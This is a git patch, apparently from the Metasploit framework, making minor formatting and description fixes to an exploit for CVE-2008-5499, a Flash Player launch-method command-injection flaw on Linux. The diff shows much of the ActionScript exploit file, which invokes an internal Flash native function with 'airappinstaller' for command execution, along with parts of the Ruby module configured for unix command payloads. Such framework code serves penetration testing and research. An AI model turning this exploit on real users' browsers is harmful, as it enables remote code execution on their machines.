From f5e8f57497f418bef41da007453fba7e9d5b34e7 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Thu, 19 Apr 2012 18:07:35 -0500 Subject: [PATCH] Minor fixes --- external/source/exploits/CVE-2008-5499/Exploit.as | 6 +++++- .../exploits/linux/browser/adobe_flashplayer_aslaunch.rb | 4 ++-- 2 files changed, 7 insertions(+), 3 deletions(-) diff --git a/external/source/exploits/CVE-2008-5499/Exploit.as b/external/source/exploits/CVE-2008-5499/Exploit.as index f27e6e50de..7ca23c81cf 100644 --- a/external/source/exploits/CVE-2008-5499/Exploit.as +++ b/external/source/exploits/CVE-2008-5499/Exploit.as @@ -7,19 +7,23 @@ PoC: http://downloads.securityfocus.com/vulnerabilities/exploits/32896.as import flash.external.ExternalInterface; class Exploit { + public function randname(newLength:Number):String{ var a:String = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"; var alphabet:Array = a.split(""); var randomLetter:String = ""; + for (var i:Number = 0; i < newLength; i++){ randomLetter += alphabet[Math.floor(Math.random() * alphabet.length)]; } + return randomLetter; } public function exploit() { var path:String = ExternalInterface.call("window.location.href.toString") + randname(6) + ".txt"; var loadVars:LoadVars = new LoadVars(); + loadVars.onData = function(str:String):Void { if (str) { if (_global.ASnative(2201, 1)("airappinstaller")) { @@ -33,7 +37,7 @@ class Exploit { } public function Exploit() { - exploit() + exploit(); } static function main() { diff --git a/modules/exploits/linux/browser/adobe_flashplayer_aslaunch.rb b/modules/exploits/linux/browser/adobe_flashplayer_aslaunch.rb index 6cd73ec1b3..d49a9e6130 100644 --- a/modules/exploits/linux/browser/adobe_flashplayer_aslaunch.rb +++ b/modules/exploits/linux/browser/adobe_flashplayer_aslaunch.rb @@ -20,7 +20,7 @@ class Metasploit3 < Msf::Exploit::Remote version 10.0.12.36 and 9.0.151.0 and prior. An input validation vulnerability allows command execution when the browser loads a SWF file which contains shell metacharacters in the arguments to - the ActionScript launch method. + the ActionScript launch method. The victim must have Adobe AIR installed for the exploit to work. This module was tested against version 10.0.12.36 (10r12_36). @@ -40,7 +40,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'HTTP::compression' => 'gzip', - 'HTTP::chunked' => true, + 'HTTP::chunked' => true }, 'Platform' => 'unix', # so unix cmd exec payloads are ok 'Arch' => ARCH_CMD,